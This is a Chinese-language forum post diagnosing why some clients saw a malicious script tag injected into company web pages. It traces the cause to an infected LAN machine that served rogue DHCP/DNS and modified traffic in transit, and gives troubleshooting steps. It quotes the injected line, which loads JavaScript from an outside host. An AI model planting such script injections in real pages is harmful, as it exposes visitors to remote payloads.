網站出現惡意連結

woff

今天有人發現公司有些主機的網頁在頁面的第一行被惡意植入Java Script
內容如下 複製內容到剪貼板

1. <script src=http://www.yuan-tai.com/home/include/1/a.js></script><title></title><title>Fuck Th3 W0rld!</title>
   

複製代碼

但有些Client 並沒有出現此一狀況
在確認公司主機並沒有問題後開始試著找尋其他可能。
最後確認的原因如下
Client 所在的區域網路, 有台電腦中毒了, 而這台電腦有 DHCP Server 與 DNS 等功能.
原本 Client 應該取得正常的 DNS , 卻抓到了偽造的 DNS 資料, 所以:
Client -> 向中毒的電腦連線 -> 中毒的電腦向真正的網站抓資料 -> 加上惡意程式 -> 傳回給 Client .

試著:
1. 指定 Client 使用固定的 IP 與 DNS , 再連 Server (用 IP 連)看看.
2. 當 Client 發生這情況時, 檢查 DHCP 主機, 及取得的 DNS 主機等資料.

例如:
正常:
192.168.1.254 -> 00:00:00:ff:ff:ff
偽造的主機
192.168.1.254 -> 00:aa:bb:cc:dd:ee
而 Client 向偽造的主機連線了.

如果確定有這台惡意主機在, 再去找出主機來處理.

參考資料：酷學園

a57571010

HOHO~~~~感謝分享~~